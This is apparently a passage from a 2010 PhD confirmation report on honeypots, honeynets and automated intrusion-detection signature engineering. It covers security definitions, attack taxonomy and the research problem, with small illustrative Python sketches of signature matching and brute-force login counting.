Ph.D. Confirmation Report
“Implement Novel Techniques for
Intrusion Detection in Honeynets, for
Automated IDS Signature Engineering”
Fahim Abbasi
Supervisor: Prof. Richard Harris
School of Engineering & Advanced Technology (SEAT)
Massey University
March 16, 2010
© Copyright by Fahim Abbasi 2010
All Rights Reserved
Table of Contents
CHAPTER 1: INTRODUCTION
1.1. INTRODUCTION
1.2. DEFINITIONS
1.2.1. INFORMATION SECURITY
1.2.2. COMPUTER SECURITY
1.2.3. NETWORK SECURITY
1.2.4. SECURITY STANDARDS AND DOCUMENTS
1.3. BLACK HATS
1.4. WHITE HATS
1.5. ATTACKS AND ATTACK CLASSIFICATION
1.5.1. ACTIVE ATTACKS
1.5.2. PASSIVE ATTACKS
1.6. TAXONOMY OF ATTACKS
CHAPTER 2: PROBLEM STATEMENT
2. SECURITY PROBLEM
2.1. CURRENT SCENARIO
2.2. COST
2.3. WHAT PEOPLE SAY ABOUT SECURITY
2.4. NEEDS
CHAPTER 3: MOTIVATION AND RESEARCH CHALLENGES
3.1. MOTIVATION
3.2. OBJECTS THAT DEMAND SECURITY
3.3. WHO IS TO BLAME?
3.4. A FEW DOCUMENTED ATTACKS
3.5. MOVING TOWARDS A SOLUTION
3.6. HONEYPOTS AND HONEYNETS
3.6.1. WHO. WHAT. WHERE, WHY AND HOW?
3.6.2. HONEYPOTS
3.6.2.1. MOTIVATION AND CONCEPT
3.6.2.2. CLASSIC EXAMPLES
3.6.2.3. DISCUSSING EXPLOITS
3.6.2.4. EXAMPLE: LEAVES WORM
3.6.2.5. EXAMPLE: CODE RED II WORM
3.6.2.6. EXAMPLE: SOLARIS DTSCD EXPLOIT
3.6.3. HONEYNETS
3.6.3.1. DATA CONTROL
3.6.3.2. DATA CAPTURE
3.6.3.3. DATA COLLECTION
3.6.3.4. HONEYNET ARCHITECTURES
3.6.3.4.1. GENERATION I ARCHITECTURE
3.6.3.4.2. GENERATION II AND III ARCHITECTURE:
3.6.3.5. VIRTUAL HONEYNET
3.7. RESEARCH CHALLENGE # 1
3.7.1. ARCHITECTURE AND DESIGN CONSIDERATIONS IN VIRTUAL HONEYNETS
3.7.2. INTRODUCTION
3.8. RESEARCH CHALLENGE # 2
3.8.1. INTRUSION DETECTION
3.8.2. INTRUSION DETECTION PROBLEM
3.8.3. INTRUSION DETECTION SIGNATURES
3.8.4. AUTOMATED SIGNATURE ENGINEERING
CHAPTER 4: OVERVIEW OF RELATED WORKS
4.1. HONEYPOTS AS ATTACK DETECTION AND LEARNING TOOLS
4.2. AUTOMATED SIGNATURE ENGINEERING USING HONEYPOTS
4.3. ANOMALY DETECTION
4.4. NETWORK BEHAVIOURAL ANALYSIS (NBA)
CHAPTER 5: RESEARCH QUESTIONS
CHAPTER 6: METHODOLOGY REVIEW
6.1. PROPOSED SYSTEM FOR VIRTUAL HONEYNET ARCHITECTURE PROBLEM
6.1.2. METHODOLOGY AND DISCUSSION
6.1.3. UBUNTU AS HONEYPOT
6.1.4. VMWARE AS VIRTUALIZATION SOFTWARE
6.1.5. HONEYWALL ROO
6.1.6. SEBEK AS DATA CAPTURE TOOL
6.2. PROPOSED SYSTEM FOR AUTOMATED SIGNATURE ENGINEERING
6.2.1. DISCUSSION
6.2.2. METHODOLOGY
6.2.2.1. ANALYSIS OF SYSTEM EVENTS
6.2.2.2. ANALYSIS OF NETWORK EVENTS
6.2.2.3. HASHING ALGORITHM FOR PAYLOAD HASHING
6.2.2.4. CLUSTERING BY COMPRESSION
6.3. RESULTS AND DISCUSSION
CHAPTER 7: RESULTS
7.1. SUMMARY
7.2. ATTACK STATISTICS
7.2.1. ATTACKED PORTS AND SERVICES
7.2.2. ATTACKER IP'S
7.2.3. ATTACKER’S COUNTRY OF ORIGIN
7.3. FORENSIC ANALYSIS
7.3.1. FIRST HACK
7.3.2. BRUTE FORCE AND BOTNETS
7.3.3. MORE BOTNETS
7.3.4. COORDINATED ATTACKS
7.3.5. LOCAL PRIVILEGE ESCALATION ATTEMPT
7.3.6. FORENSICS OF AN ENCRYPTED BOTNET
7.3.6.3. FORENSICS OF A HACKER’S IRC SESSION
8. ACHIEVEMENTS
9. RESEARCH PLAN
REFERENCES:
APPENDIX - A
SEBEK LOGS
SSH LOGS
List of Figures
FIGURE 1: ATTACK CONSEQUENCES VS LIKELIHOOD [84]
FIGURE 2: INTRUDER KNOWLEDGE VS SOPHISTICATION OF ATTACK [42]
FIGURE 3: INCIDENTS REPORTED TILL 2003 [37, 43]
FIGURE 4: THREAT CATEGORIES OVER TIME BY PERCENT OF BREACHES [50]
FIGURE 5: GEN I HONEYNET ARCHITECTURE [12]
FIGURE 6: GENERATION III HONEYNET ARCHITECTURE [12]
FIGURE 7: PROPOSED VIRTUAL HONEYNET ARCHITECTURE
FIGURE 8: ROO LOGICAL DESIGN
FIGURE 9: BEHAVIOURAL PROFILE FOR W32-BAGLE-Q WORM [94]
FIGURE 10: CLUSTERING BY COMPRESSION AND HASHING
FIGURE 11: HONEYNET DATA GRAPHICAL VIEW (IP-PORT)
FIGURE 12: PROBED PORTS
FIGURE 14: PROBED PORTS (EXCLUDING SSH)
FIGURE 15: TOP 50 ATTACKS BY COUNTRY
List of Tables
TABLE 1: WHAT PEOPLE SAY ABOUT SECURITY?
TABLE 2: HONEYPOT: CLASSIC EXAMPLES
TABLE 3: HONEYPOT: DISCUSSING EXPLOITS
TABLE 4: HONEYPOT: LEAVES WORM
TABLE 5: HONEYPOT: CODE RED II WORM
TABLE 6: HONEYPOT: SOLARIS DTSCD EXPLOIT
TABLE 7: SSH PATCH FOR THE HONEYPOT
TABLE 8: SSH LOGS
TABLE 9: COMPARISON OF MD5 AND FUZZY HASHING
TABLE 10: PROPOSED HASHED TECHNIQUE
TABLE 11: OLD TECHNIQUE (NCD ONLY)
TABLE 12: FORENSICS: HACK
TABLE 13: FORENSICS: BRUTE FORCE AND BOTNETS
TABLE 14: FORENSICS: MORE BOTNETS
TABLE 15: FORENSICS: COORDINATED ATTACKS
TABLE 16: FORENSICS: LOCAL PRIVILEGE ESCALATION ATTEMPT
TABLE 17: FORENSICS OF ENCRYPTED BOTNET
TABLE 18: FORENSIC OF A HACKERS IRC SESSION
Chapter 1: Introduction
1.1. INTRODUCTION
The revolution in Information Technology has provided a flood of assets in the form of
applications and services. Enterprises have based their entire business models on top
of these assets. Networks have evolved from low-speed half-duplex links to full-duplex,
multi-homed, self-converging, gigabit streams controlled by advanced protocols. The
security of the applications and services accessible over these networks
currently represents a major challenge to the IT industry. Each day, exploits, worms,
viruses and buffer overflows severely threaten the IT infrastructure and associated
business assets, along with mission-critical systems. By learning the tactics and
techniques used by malicious black hats (crackers), we can secure our data assets and
infrastructure. This demands learning from both system-wide and network-wide
resources.
Security is not an out-of-the-box solution. It requires careful analysis of the environment
at hand before a solution can be proposed. It is a layered process and demands a
thorough understanding of the system and its constraints. No system is
100 percent secure; the security of a system is only as strong as its weakest point [28].
Security designs based on eggshell security models have proven to be most vulnerable:
"This can be viewed as an 'eggshell' security model: hard outer shell, soft in the center."
[29]. Therefore, security should be implemented in layers based on a defence in depth
model [30] rather than an eggshell model. This considerably increases the difficulty of
penetrating the system, because an attacker who breaches one layer has gained access to
only a part or a component of the entire system. It also gives the system administrators
enough time to address the problem by patching or reconfiguring their resources. Each day
we witness new vulnerabilities emerging in everyday software.
When exploited, these vulnerabilities lead to the compromise of systems. Crackers write
customized software to target these vulnerabilities. Self-propagating programs of this kind
are called worms.
Worms spread like an epidemic over the Internet; they self-propagate and infect
systems at very high rates. They can soon consume millions of systems, taking full
control and awaiting further instructions. Many such worms install special client software
on their victims, which chains them to an existing network of zombies.
The result is a highly distributed network of machines that, on receiving a single
instruction from their owner, may cause all sorts of havoc. Examples include data and
information theft, covering credit card details, online bank accounts, email and social
networking credentials. This information is a valuable asset in the underground economy,
where it is sold for considerable sums. Available security tools, while providing a good
set of static defences, cannot cope with the dynamic nature of these threats. Most network
security tools, such as firewalls and Intrusion Detection Systems (IDS), are passive in
nature. They operate on the rules and signatures available in their database.
Detection is thus limited to that set of available rules: any activity that does not match
a known rule or signature goes unnoticed and undetected. To analyse the tools that attackers
use to obtain access, we need to set up a vulnerable environment that poses as a valid
resource to any attacker but is heavily logged. Honeypots, by design, allow you to take
the initiative by turning the tables on malicious black hats. A Honeypot system has no
production value and no authorized activity. Thus any interaction with the Honeypot
is most likely the result of malicious intent. Honeypots do not solve the security problem,
but they provide data and knowledge that aid the system administrator in enhancing the
overall security of the network. This knowledge can be used as input to any early
warning system. Over the years, researchers have successfully isolated and identified
worms and exploits using Honeypots placed in specialized architectures called
Honeynets. The captured worms and exploits are then used for signature and rule
development. Honeynets are capable of logging far more information than other available
security tools. They give insight into attacks and attackers, their skill level, their
organization as groups or individuals, and their motives and tactics; almost every aspect
is logged and can be made auditable. In this research, this information will be analysed
to develop a system for automated attack classification and signature generation.
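The contrast drawn above between signature-based tools and Honeypots can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the signature strings, IP addresses and payloads are invented placeholders, and the two functions are hypothetical helpers, not part of any real IDS or Honeynet tool.

```python
# Illustrative sketch only: signatures, addresses and payloads are invented.
KNOWN_SIGNATURES = [b"KNOWN-EXPLOIT-A", b"KNOWN-EXPLOIT-B"]  # assumed rule database
HONEYPOT_ADDRESSES = {"10.0.0.50"}  # assumed address of a Honeypot


def signature_match(payload: bytes) -> bool:
    """Static defence: alert only if the payload contains a known signature."""
    return any(sig in payload for sig in KNOWN_SIGNATURES)


def honeypot_alert(dst_ip: str) -> bool:
    """Honeypot rule: no authorized activity exists, so any contact is suspicious."""
    return dst_ip in HONEYPOT_ADDRESSES


# (destination IP, payload) pairs standing in for observed traffic.
events = [
    ("10.0.0.20", b"GET /KNOWN-EXPLOIT-A HTTP/1.0"),  # known attack on a production host
    ("10.0.0.20", b"GET /novel-exploit HTTP/1.0"),    # unknown attack on a production host
    ("10.0.0.50", b"GET /novel-exploit HTTP/1.0"),    # unknown attack on the Honeypot
]

results = [(dst, signature_match(p), honeypot_alert(dst)) for dst, p in events]
for row in results:
    print(row)
```

In this sketch the second event slips past the signature check because no rule describes it, whereas the same payload sent to the Honeypot is flagged purely because of where it was sent.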
We start the proposal by defining computer and network security terminology as
background to the research work to be undertaken. This is followed by a brief
description of attackers and attacks. In Chapter 2 we describe the security problem as
the problem statement for this research, along with a brief background of its evolution.
In Chapter 3 we describe the motivation for studying this domain and detail some of the
problems that are associated with it. In Section 3.5 we propose a solution to the
problem. In Section 3.6 we present the technology required to underpin the research
and discuss current implementations and standards. In Section 3.7 we identify the first
research challenge and discuss our experiences with the technology; here we find that
current implementations lack some vital functionality which is solved by our proposed
technique. In Section 3.8 we identify the second research challenge and discuss
problems with current technology. In Chapter 4 we give an overview of existing related
research activity. In Chapter 5 we provide a summary of the key research questions
relevant to this proposal. In Chapter 6 we propose solutions to address the problem. In
Chapter 7 we discuss results obtained so far by the technology that we have used.
Finally, we shall detail the progress we have made and the resources that have been
developed so far. We also list publications and talks that have been delivered, together
with an indication of proposed future directions with their associated milestones.
1.2. DEFINITIONS
1.2.1. Information Security
“Information security deals with those administrative policies and procedures for
identifying, controlling, and protecting information from unauthorized manipulation. This
protection encompasses how information is processed, distributed, stored, and
destroyed” [31]
1.2.2. Computer Security
“A computer is secure if you can depend on it and its software to behave as you
expect.” [32]
Computer security is essential [33]:
• “To prevent theft of or damage to the hardware
• To prevent theft of or damage to the information
• To prevent disruption of service”
1.2.3. Network Security
“Network security refers to all hardware and software functions, characteristics,
features, operational procedures, accountability measures, access controls, and
administrative and management policy required to provide an acceptable level of
protection for hardware, software, and information in a network”. [31]
Network security is the art of securing and protecting network resources and
assets, such as routers, servers, hosts and any other device connected to the
organization's network, from unauthorized and unwanted access that may expose these
assets to threats such as denial of service and the modification, destruction or
disclosure of information.
Network security falls under information security and demands
securing all information assets connected to a network, as well as all
information passing through the network.
1.2.4. Security Standards and Documents
The ITU-T Security Architecture for Open Systems Interconnection (OSI), Recommendation
X.800, and RFC 2828 are the standard documents defining security services. X.800
divides the security services into 5 categories and 14 specific services, which can be
summarized as:
“1. AUTHENTICATION:
The assurance that the communicating entity is the one that it claims to be.
It includes:
• Peer Entity Authentication
• Data Origin Authentication
2. ACCESS CONTROL:
The prevention of unauthorized use of a resource (i.e., this service controls who can have
access to a resource, under what conditions access can occur, and what those accessing the
resource are allowed to do).
3. DATA CONFIDENTIALITY:
The protection of data from unauthorized disclosure.
It includes:
• Connection Confidentiality
• Connectionless Confidentiality
• Selective-Field Confidentiality
• Traffic Flow Confidentiality
4. DATA INTEGRITY:
The assurance that data received are exactly as sent by an authorized entity (i.e., contain no
modification, insertion, deletion, or replay).
It includes:
• Connection Integrity with Recovery
• Connection Integrity without Recovery
• Selective-Field Connection Integrity
• Connectionless Integrity
• Selective-Field Connectionless Integrity
5. NONREPUDIATION:
Provides protection against denial by one of the entities involved in a communication of having
participated in all or part of the communication.
It includes:
• Nonrepudiation, Origin
• Nonrepudiation, Destination”
[8], [9], [1]
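As a quick cross-check of the "5 categories and 14 specific services" summary, the quoted list can be written down as a small Python dictionary. The service names come from the quotation above; the dictionary layout, the variable names, and the choice to count Access Control as a single service of its own are assumptions made for this sketch.

```python
# Service names follow the X.800 summary quoted above.
# Assumption: Access Control is counted as one specific service.
X800_SERVICES = {
    "Authentication": [
        "Peer Entity Authentication",
        "Data Origin Authentication",
    ],
    "Access Control": [
        "Access Control",
    ],
    "Data Confidentiality": [
        "Connection Confidentiality",
        "Connectionless Confidentiality",
        "Selective-Field Confidentiality",
        "Traffic Flow Confidentiality",
    ],
    "Data Integrity": [
        "Connection Integrity with Recovery",
        "Connection Integrity without Recovery",
        "Selective-Field Connection Integrity",
        "Connectionless Integrity",
        "Selective-Field Connectionless Integrity",
    ],
    "Nonrepudiation": [
        "Nonrepudiation, Origin",
        "Nonrepudiation, Destination",
    ],
}

category_count = len(X800_SERVICES)
service_count = sum(len(services) for services in X800_SERVICES.values())
print(category_count, "categories,", service_count, "specific services")
```

Under that counting assumption the totals agree with the figures stated in the text.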
1.3. Black Hats
Black hats are highly skilled hackers or computer professionals who use their skill and
knowledge to gain illegitimate access to computer and information systems. They are
often socially, economically or politically (hacktivist) motivated in their cause.
Often they are driven by zeal and curiosity to learn about computer systems and
their secrets. Their goal is to exploit flaws or vulnerabilities in systems and use them for
their own gain. The targets can be computer systems or humans (social engineering).
Black hats use technology for identity theft, vandalism, credit card fraud, phishing,
intellectual property theft (piracy) and many other types of sophisticated crime. In
general terms their activities include taking illegal control of remote computing
resources via a network; gaining illegal access to software by cracking; collecting
victims' information using spyware; scanning victims for exploitable weaknesses or
enumerating them using various scanners; writing self-replicating software, such as
worms and viruses, that exploits all network-accessible systems; infecting victims with
backdoors, rootkits and trojans for remote access; creating an army of such remotely
controlled zombie systems, usually over IRC (botnets); and finally launching Denial of
Service (DoS) and Distributed Denial of Service (DDoS) attacks to knock their targets
offline or suspend their service temporarily. These attackers can be 13-year-old novice
users playing around with powerful hacking tools (script kiddies) or very sophisticated
and elite system and network administrators (1337, a term used by the more sophisticated
or elite hackers).
Black hat hackers are the biggest threat, both internal and external, to the IT
infrastructure of any organization, as they are constantly challenging the security of
applications and services. The name “black hat” derives from the colour of the hat
worn by outlaws and bad guys in many Western movies and throughout the media, where
it signals their intent; however, some computer geeks simply find the
black colour more appealing.
1.4. White Hats
White hats are ethically opposed to the black hats. White hat hackers utilize their skill
and knowledge to secure and protect information and computer systems and to prevent
attackers from accessing them illegally. They study black hat threats and
devise mechanisms for identification, protection and prevention in the form of security
policies and tools. They constantly check systems for vulnerabilities and exploits,
correct them, and have devised mechanisms for the quick update and
distribution of their research and knowledge amongst the community to secure systems.
White hat hackers are considered the white knights, the good guys and protectors.
They are the defenders of the cyber frontier that is always under attack by the black
hats. Whether attacking or defending, hackers have played a major role in evolving today's
technology and services. No system is 100% secure; thus a principal requirement is to
strengthen the mechanisms used to study the black hats and defend our information
assets.
1.5. Attacks and Attack Classification
Generally, attacks fall into two major categories:
1. Active Attacks
2. Passive Attacks
1.5.1. Active Attacks
Active attacks involve the attacker taking the offensive and directing malicious packets
towards the victim in order to gain illegitimate access to the target machine, for example
by trying exhaustive user name and password combinations, as in brute-force attacks, or by
exploiting remote and local vulnerabilities in services and applications, which are
termed 'holes'. Other types of active attack include:
• Masquerading attack, in which the attacker masquerades as, or pretends to be, a
different entity.
• Replay attack, in which the attacker captures data and retransmits it to produce an
unauthorized effect.
• Modification attack, in which a message or file is modified by the
attacker to achieve his malicious goals.
• Denial of service (DoS) attack, in which the attacker tries to knock a
machine or resource offline to disrupt or delay a service.
TCP and ICMP scanning is also a form of active attack, in
which the attacker exploits the way protocols are designed to respond. Examples of
attacks that exploit protocol behaviour include the ping of death and SYN attacks.
In all types of active attack the attacker creates noise on the network by transmitting
packets, making it possible to detect and trace the attacker. It has been observed,
however, that skilful attackers usually attack their victims from proxy
hosts that they have compromised earlier.
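Because active attacks are noisy, even simple counting can expose them. The following Python sketch illustrates this for the brute-force case mentioned above. The log records, the IP addresses, the threshold and the function name are all assumptions made for the example; they do not reflect the log format of any particular tool.

```python
from collections import Counter

# Hypothetical, simplified login records: (source IP, login succeeded?).
login_attempts = [
    ("203.0.113.7", False),
    ("203.0.113.7", False),
    ("198.51.100.2", False),
    ("203.0.113.7", False),
    ("198.51.100.2", True),
    ("203.0.113.7", False),
]

FAILURE_THRESHOLD = 3  # assumed cut-off; a real deployment would tune this


def brute_force_suspects(attempts, threshold=FAILURE_THRESHOLD):
    """Return source IPs whose number of failed logins reaches the threshold."""
    failures = Counter(ip for ip, succeeded in attempts if not succeeded)
    return sorted(ip for ip, count in failures.items() if count >= threshold)


suspects = brute_force_suspects(login_attempts)
print(suspects)
```

Note that the flagged address may belong to a previously compromised proxy host rather than to the attacker, as the paragraph above points out.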
1.5.2. Passive Attacks
Passive attacks involve the attacker intercepting, collecting and monitoring
transmissions sent by the victim. In the process, the attacker eavesdrops on the
victim's communications. Passive
attacks are very specialized types of attack aimed at obtaining information
that is being transmitted over secure and insecure channels. Since the attacker
creates little or no noise on the network, passive attacks are very difficult to detect
and identify.
Passive attacks can be divided into 2 main types, the release of message content and
traffic analysis.
Release of message content involves protecting message content from getting in
hands of unauthorized users during transmission. This can be as basic as a message
delivered via a telephone conversation, instant messenger chat, email or a file.
Traffic analysis involves techniques that attackers apply to the intercepted, encrypted
messages of their victims. Encryption masks the contents of a message using mathematical
formulas and thus makes them unreadable. The original message can only be retrieved by
the reverse process, called decryption. Such a cryptographic system is often based on a
key or a password supplied by the user. With traffic analysis the attacker passively
observes patterns, trends, frequencies and lengths of messages, either to infer
information about the communication or to support cryptanalysis aimed at guessing the
key or recovering the original message.
1.6. Taxonomy of attacks
Attack classification has always been an interesting area for security researchers. As a
first step, Computer Incident Response Teams (CIRT) are required to classify the
attacks at hand in their reports. This classification should be complete enough to give
an in-depth view of the attack, the attacker, the target and the vulnerability exploited.
Based on this classification, a mitigation plan is proposed. Many classification
techniques have been proposed and adopted and later replaced by better techniques
over the years. Based on the taxonomical work conducted by Hansman et al. on the
characterization and dimensioning of computer and network attacks, we can classify
attacks as [37]:
• Virus: self-replicating program that propagates through some form of infected
files
• Worms: self-replicating program that propagates through network services on
computers or through email.
• Trojans: a program made to appear benign that serves some malicious purpose
• Buffer overflows: a process that gains control or crashes another process by
overflowing the other process’s buffer
• Denial of service attacks: an attack which prevents legitimate users from
accessing or using a host or network
• Network attacks: attacks focused on attacking a network or the users on the
network by manipulating network protocols, ranging from the data-link layer to
the application layer
• Physical attacks: attacks based on damaging physical components of a network
or computer
• Password attacks: attacks aimed at gaining a password
• Information gathering attacks: attacks in which no physical or digital damage is
carried out and no subversion occurs, but in which important information is
gained by the attacker, possibly to be used in a further attack
Chapter 2: Problem Statement
2. SECURITY PROBLEM
2.1. Current Scenario
Cyber crime has grown from vague reports of a victim’s Yahoo or Hotmail account being
hacked, or a student changing his grades in the school database, into an entire
underground industry with its own underground economy. Data, the raw material of this
industry, is continually being ripped out and harvested from globally distributed
computers on an industrial scale. Malicious hackers and crackers act as the workforce
and enablers of this industry. The industry makes revenue by selling its finished
products (credit card details, authentication credentials, malware etc.) and services
(customized malware and support to use it) to the general public. Everything is
available in this market, from sophisticated customized malware scripts to a botnet of a
hundred thousand nodes for hire.
An entire industry of cyber criminals is continuously creating sophisticated malware
that causes data breaches on network connected computers all across the globe. Cyber
crimes are easy to commit due to the lack of policies, or of their implementation,
within a state or across borders. The Internet crime industry is becoming highly
lucrative. [38]
Malware is becoming more targeted, harder to detect and harder to remove. The security
arena has witnessed a huge change in the threat landscape with the emergence of mobile
devices and virtualization. Threats are now becoming mobile and pervasive over the
cloud. VM sprawl is a big security concern, as VMs sprout like mushrooms from the
ground, often misconfigured, to the dismay of the security engineer. All these
developments contribute to a weakened grip on security, as the “Protect, Detect, and
React” paradigm becomes harder to implement. [30]
Solera Networks has suggested a threat classification in its whitepaper [84]. Network
threats are classified into four categories:
1. Threats coming in
2. Threats invited in
3. Threats already in
4. Threats going out
Network perimeter attacks, such as XSS and SQL injection, exploit vulnerabilities in
public web portals to steal sensitive proprietary data, including sensitive user
information, from backend databases. Such attacks account for the threats coming in. [84]
Social and technological attacks, such as emails phishing for information or inviting
users to be victimized by drive-by downloads, and online social interactions which
innocently request personal or confidential information, account for the threats invited
in. [84]
Threats already inside the network are claimed to be the most dangerous threats. They
can be due to compromised systems or a renegade employee. If left unattended, the damage
potential of these threats can quickly escalate. Being inside the network, an attacker
can do nearly anything that they desire. [84]
Threats going out lead to the exodus of sensitive data from a business enterprise and
are critical. They can jeopardize confidential trade secrets, customer information such
as social security numbers or credit card details, or classified national security
information such as security plans for the head of state or parliamentarians. The
attackers may also turn the business network to their own underground business needs,
for example by running active spambots that push out bulk emails. [84]
Many organizations limit their security to perimeter security. An enterprise faces a
constant threat from “things coming in” due to perimeter penetration, also termed
“walking through the front door”. This can be due to technical vulnerabilities, such as
SQL injection or flaws in browsers, Flash or media players, or to a social
vulnerability. Once an attacker has managed to bring down that wall, very bad things can
happen. Since traditional perimeter defences face the outside network, they are blind to
the inside. This can lead to the emergence of flows comprising traffic from bots,
spambots and content distribution nodes, and to the leakage of sensitive data from
inside the network to the outside world. A survey conducted by the FBI and the Computer
Security Institute reported that over 70 percent of the loss of confidential information
comes from inside the organization. The security model must be layered, with internal
assets secured, partitioned and monitored. [39] The need for a defence-in-depth strategy
is now felt more than ever.
In the realm of security, response time is critical and saves money. There are many
threats that an organization is prone to, with a very small subset of them marked as
known threats. The only way to respond to breaches quickly and effectively is by doing
root cause analysis.
Surveillance is vital to security. We all expect a breach, but our existing tools do not
help us when it happens. The situation is analogous to the real world, where we have
security cameras everywhere: they monitor everything but do not respond. It is up to the
vigilance of the surveillance expert to identify an event of interest and report it.
There is a dire need to look out for events of interest.
Cohen et al [40] established the security problem as:
“Our society is so reliant on information that the loss or corruption of the United States’
information infrastructure would create a situation where the national banking system,
electric power grid, transportation systems, food and water supplies, communication
systems, medical systems, emergency services, and most businesses [could not]
survive.”
“Organizations that value their internal information realize that information is a
strategic and competitive tool” [41].
2.2. Cost
The longer an attack goes on, the more expensive it becomes. Direct costs include
downtime, IT resources and stolen data or IP. Indirect costs include follow-on incidents,
impact to brand and remediation for maximum scope. The faster we are able to find the
source and scope of the breach, the less expensive it will be for us.
Figure 1: Attack Consequences vs Likelihood [84]
2.3. What People Say About Security
Symantec predicts: In 2010, 'antivirus is not enough'
December 10th, 2009
"...the industry is quickly realizing that traditional approaches to antivirus, both
file signatures and heuristic/behavioural capabilities, are not enough to protect
against today's threats."
Network Solutions Warns Merchants After Hack
600,000 credit card numbers stolen from Ecommerce Hosting merchants
Robert McMillan — July 7, 2009
NY Times Website Infected With Fake Antivirus
September 15th, 2009
"It's a fake page for a nonexistent antivirus app, which is actually malware...It's a
multimillion dollar business"
Annual Threat Assessment of the US Intelligence Community for the Senate
Select Committee on Intelligence
February 2nd, 2010
"Sensitive information is stolen daily from both government and private sector
networks... We often find persistent, unauthorized, and at times, unattributable
presences on exploited networks... We cannot be certain that our cyberspace
infrastructure will remain available..."
Hackers are defeating tough authentication, Gartner warns
January 18th, 2010
"Cybercriminals are using increasingly sophisticated tactics to outmaneuver
security systems so they can steal customers' log-in credentials and pillage their
bank accounts, according to a Gartner analyst"
Google Hack Attack Was Ultra Sophisticated
January 14th, 2010
"Hackers...used unprecedented tactics that combined encryption, stealth
programming and an unknown hole in Internet Explorer"
More Victims Of Chinese Hacking Attacks Come Forward
January 14th, 2010
"This attack involved very advanced methods, with several pieces of malware
working in concert to give the attackers full control of the infected system, at the
same time it attempts to disguise itself as a common connection to a secure
website"
U.S. Army Website Hacked
January 12th, 2010
"Every organization has these problems...They may not realize it, but they're just
waiting for a smart kid to come along and copy off every critical piece of
information they have"
Table 1: What People say about security?
2.4. Needs
Lessons learned from history point towards a need for re-evaluation of current
techniques. These can be summarized as the following needs:
• Need to stop and remediate events quickly.
• Need to do more and find the root cause of breaches.
• Need for better forensic analysis and tools.
• Need for techniques to glean information from the data.
• Need for consistent policies across borders.
• Need for stronger passwords or keys.
• Need to secure application level vulnerabilities.
• Need for automation in the security industry.
• Need for more dynamic security technology.
• Need to get information out of systems intelligently: logging in depth, better log
management, better log analysis and better management roles.
• Need to know what to protect and how to protect it.
• Need to know the threat you face; know your enemy.
• Requirement to be vigilant and responsive.
Chapter 3: Motivation and Research Challenges
3.1. Motivation
Security is a collective effort and demands thorough planning. Unfortunately, in the past
it was routinely overlooked and not considered a real problem. The need for securing
data and information assets was first felt publicly after the commercialization of the
Internet in the late 1980s. Paula [41] has correlated this with the emergence of the
first virus in 1988: “Therefore, in the fall of 1988 the world saw evidence of the true
threats that existed to network security. The Internet Virus was launched at that time
and all of the 60,000 computers on the Internet were crippled for two entire days.”
A historical study [41] reveals that the first published document on security was the
“Trusted Computer System Evaluation Criteria”, which was a host hardening manual
that ignored the network security aspects.
No real threats were felt at the time, as the early Internet was shared between very few
organizations, mostly to conduct, collaborate on and share research. Before this, more
emphasis was placed on running, maintaining and expanding the ARPAnet. As Paula [41]
states: “People who used the ARPAnet were scholars and government employees
who were at the time more concerned with discovery than with destruction.”
Over the years we have observed a sharp increase in the intricacy, sophistication and
overall frequency of attacks. A great share of these attacks is attributable to the
availability of user-friendly hacking tools, which do not demand a great deal of
understanding from their users. Lipson (2002) has illustrated this trend graphically:
Figure 2: Intruder knowledge vs sophistication of attack [42]
3.2. Objects that demand security
• Operating systems not designed with much security in mind (Win9x, WinNT, XP,
Linux).
• Applications not designed with security in mind (office applications, web
browsers).
• Services not designed with security in mind (ftp, telnet, http, r-services).
• Misconfigured folder permissions that let ordinary system users access sensitive
system files.
• Misconfigured networks that expose disk shares and other information resources
to the outside world with full permissions.
3.3. Who is to Blame?
• Why is everything considered secure by default until it is exploited?
• Blame the coders?
• Blame the architects/designers?
• What about users who keep weak or easily guessable passwords? Blame the
human?
Time has proven that security is a collective effort. We can only blame ourselves for not
thinking about security while coding, designing, testing or implementing software and
hardware. It was not until organizations were robbed of their data that they realized
the magnitude of the problem and started work on a solution.
3.4. A Few Documented Attacks
Since 1999 there has been a tremendous increase in the number of incidents reported,
as shown by statistics from the Computer Emergency Response Team Coordination Center
(CERT/CC) (CERT, 2003).
Figure 3: Incidents reported till 2003 [37, 43]
A few notable incidents are documented here:
• FBI statistics state that up to five billion dollars is lost each year due to
information theft through computer crimes.
• 285 million records were compromised in 2008.
• In 2009, 10 million USD were stolen worldwide using ATM cards in less than 24
hours. These thefts were conducted by a well-organized band of bank robbers.
[38]
• “US-CERT is aware of public reports indicating a widespread infection of the
Conficker/Downandup worm, which can infect a Microsoft Windows system from
a thumb drive, a network share, or directly across a corporate network, if the
network servers are not patched with the MS08-067 patch from Microsoft.
Researchers have discovered a new variant of the Conficker Worm on April 9,
2009.” [49]
• Increase in web based and application hacks as per the Verizon report. [50]
• The Verizon data breach report of 2009 reveals who was behind data breaches:
74% resulted from external sources, 20% were caused by insiders, 32%
implicated business partners, and 39% involved multiple parties (+9%). [50]
• The same report gives the following breakdown of how breaches occurred:
67% were aided by significant errors, 64% resulted from hacking, 38% utilized
malware, 22% involved privilege misuse (+7%), 9% occurred via physical attacks. [50]
• 85% of organizations had a major network incident in the past 3 years or expect a
major incident in the next 3 years. [50]
Figure 4: Threat categories over time by percent of breaches [50]
3.5. Moving Towards a Solution
Security tools by themselves cannot save us from the onslaught of malicious black hat
crackers. These tools require intelligent use and configuration before they become
effective. Stephen Northcutt and Judy Novak have established this in their book:
“Intrusion detection is not a specific tool but a capability, a blending of tools and
techniques” [51]
Flawed assumptions about security tools lead to a false sense of security. For example,
what use is antivirus software if it is not updated frequently? What use is a firewall
if the user does not know how to configure it and relies on default policies every time?
The same goes for IDS and IPS. Networks are becoming more scalable and are rapidly
evolving. It is a world of dynamic services and dynamic networks, attracting dynamic
threats.
Available static defences such as AV systems, firewalls and IDS are not sufficient.
They involve too much manual input from humans and require hours of analysis before
new rules and signatures can be produced; meanwhile the threat is running in the wild,
infecting and claiming more and more resources. Most network security tools, such as
firewalls and Intrusion Detection Systems (IDS), are passive in nature. They operate on
the rules and signatures available in their database. Detection of anomalous activity is
thus limited to this set of available rules, and any activity that the rules do not
describe goes undetected. Research remains the most effective way to understand
vulnerabilities, how they are identified and how they are exploited, as well as the
hacker tools used to exploit them and the tactics involved. By learning the tactics and
techniques used by the malicious black hats we can secure our IT assets and
infrastructure. Honeypots provide a means to study the techniques and tactics by which
black hats gain illegitimate access to system resources, along with methods to analyse
the tools they use. This is achieved by setting up a vulnerable environment that poses
as a valid resource to any attacker, but is heavily logged.
The ideal solution to the security challenges of today is a comprehensive
vulnerability management program that detects all sorts of intrusions, threats and
